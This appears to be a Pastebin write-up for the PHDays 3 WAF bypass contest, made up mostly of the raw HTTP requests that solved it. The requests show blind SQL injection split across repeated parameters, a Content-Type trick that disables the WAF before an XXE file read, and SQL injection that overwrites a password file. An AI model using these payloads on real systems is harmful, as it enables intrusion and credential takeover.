Guest User

Untitled

a guest
May 28th, 2013
477
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. = PHDays 3 WAF bypass contest
  2. == Stage 1.
  3. Blind SQLi, use multiple params with the same name to bypass WAF:
  4. POST /api/ HTTP/1.1
  5. Host: 62.148.7.178
  6. Content-Length: 1985
  7. Referer: http://62.148.7.178/
  8. Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  9. Accept-Encoding: *
  10. User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:21.0) Gecko/20100101
  11. Firefox/21.0
  12.  
  13. <?xml version="1.0"?><request><search_name>
  14. </search_name><search_name>Kn</search_name><search_name>ig</search_name><search_name>ht</search_name><search_name>
  15. '</search_name><search_name>
  16. a</search_name><search_name>nd</search_name><search_name>
  17. (</search_name><search_name>or</search_name><search_name>d(</search_name><search_name>su</search_name><search_name>bs</search_name><search_name>tr</search_name><search_name>in</search_name><search_name>g(</search_name><search_name>(s</search_name><search_name>el</search_name><search_name>ec</search_name><search_name>t
  18. </search_name><search_name>fl</search_name><search_name>ag</search_name><search_name>
  19. f</search_name><search_name>ro</search_name><search_name>m
  20. </search_name><search_name>se</search_name><search_name>cr</search_name><search_name>et</search_name><search_name>_t</search_name><search_name>bl</search_name><search_name>
  21. w</search_name><search_name>he</search_name><search_name>re</search_name><search_name>
  22. f</search_name><search_name>la</search_name><search_name>g
  23. </search_name><search_name>=
  24. </search_name><search_name>'3</search_name><search_name>06</search_name><search_name>6d</search_name><search_name>7f</search_name><search_name>69</search_name><search_name>d7</search_name><search_name>98</search_name><search_name>70</search_name><search_name>06</search_name><search_name>8f</search_name><search_name>ae</search_name><search_name>85</search_name><search_name>21</search_name><search_name>c0</search_name><search_name>61</search_name><search_name>4b</search_name><search_name>2'</search_name><search_name>
  25. l</search_name><search_name>im</search_name><search_name>it</search_name><search_name>
  26. 0</search_name><search_name>,1</search_name><search_name>),</search_name><search_name>1,</search_name><search_name>1)</search_name><search_name>)&gt;</search_name><search_name>
  27. 4</search_name><search_name>9 </search_name><search_name>)
  28. </search_name><search_name>--</search_name><search_name>
  29. a</search_name></request>
  30.  
  31. Flag #1, mysql database test, table secret_tbl, column flag:
  32. 3066d7f69d79870068fae8521c0614b2
  33. The second column contains the string /var/lib/sepolgen/1241232eerwqwa/asfgasddddd11111/flag
  34. == Flag 2
  35. Notice the content-type trick that turned WAF off
  36. POST /api/ HTTP/1.1
  37. Host: 62.148.7.178
  38. Content-Length: 176
  39. Referer: http://62.148.7.178/
  40. Content-Type: multipart/whatever; charset=EUC-JP
  41. Accept-Encoding: *
  42. User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:21.0) Gecko/20100101
  43. Firefox/21.0
  44.  
  45. <?xml version="1.0" standalone="no"?><!DOCTYPE x [<!ENTITY e SYSTEM
  46. '/var/lib/sepolgen/1241232eerwqwa/asfgasddddd11111/flag'>]><request><search_name>&e;</search_name></request>
  47. == Flag 3
  48. 494bf6673d0f0b8fafac5b637de9a70d
  49. Rewrite htpasswd file via sqli, log in as winer, grab the flag
  50. POST /api/ HTTP/1.1
  51. Host: 62.148.7.178
  52. Content-Length: 172
  53. Referer: http://62.148.7.178/
  54. Content-Type: asdsadsa; charset=EUC-JP
  55. Accept-Encoding: *
  56. User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:21.0) Gecko/20100101
  57. Firefox/21.0
  58.  
  59. <?xml version="1.0" standalone="no"?><request><search_name>asd' UNION
  60. select 'admin:XfOn8YD6hQ.NU' into outfile
  61. '/var/www/thirdstage/winnerpwd' -- a</search_name></request>
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×